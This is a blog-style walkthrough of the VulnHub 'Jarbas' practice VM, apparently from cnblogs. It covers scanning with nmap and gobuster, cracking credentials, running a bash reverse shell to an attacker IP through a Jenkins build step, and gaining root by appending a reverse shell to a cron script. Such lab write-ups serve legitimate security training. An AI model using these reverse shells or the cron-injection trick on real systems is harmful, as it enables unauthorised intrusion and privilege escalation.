vulnhub - Jarbas

vulnhub - Jarbas

信息收集

image-20240814170213217

sudo nmap -sT -sV -sC -O -p22,80,3306,8080 192.168.157.176

image-20240814170506666

sudo nmap -script=vuln -p22,80,3306,8080 192.168.157.176

image-20240814171222768

有robots.txt

# we don't want robots to click "build" links

8080是后台登录

目录扫描

扫一下目录(不指定-x php,html的话没扫到)

sudo gobuster dir -u http://192.168.157.176 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,html

image-20240814172939527

有/access.html

image-20240815161341538

解完md5得到三个用户及密码

tiago:italia99
trindade:marianna
eder:vipsu

其中eder:vipsu可以登录8080的后台

登入CMS反弹shell

创建项目后翻找可以执行命令的地方

image-20240815162249330

直接弹shell

/bin/bash -i >& /dev/tcp/192.168.157.161/9999 0>&1

保存后构建即可

image-20240815162526760

没有权限

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash

crontab提权

查看系统定时任务: cat /etc/crontab

发现了一个每五分钟定期执行的sh脚本CleaningScript.sh

image-20240815162911790

将反弹Shell的命令写入脚本文件

echo "/bin/bash -i >& /dev/tcp/192.168.157.161/7777 0>&1" >> /etc/script/CleaningScript.sh

等shell就好了

image-20240815163644072

posted @   Mar10  阅读(21)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 别再用vector<bool>了!Google高级工程师:这可能是STL最大的设计失误
· 单元测试从入门到精通
点击右上角即可分享
微信分享提示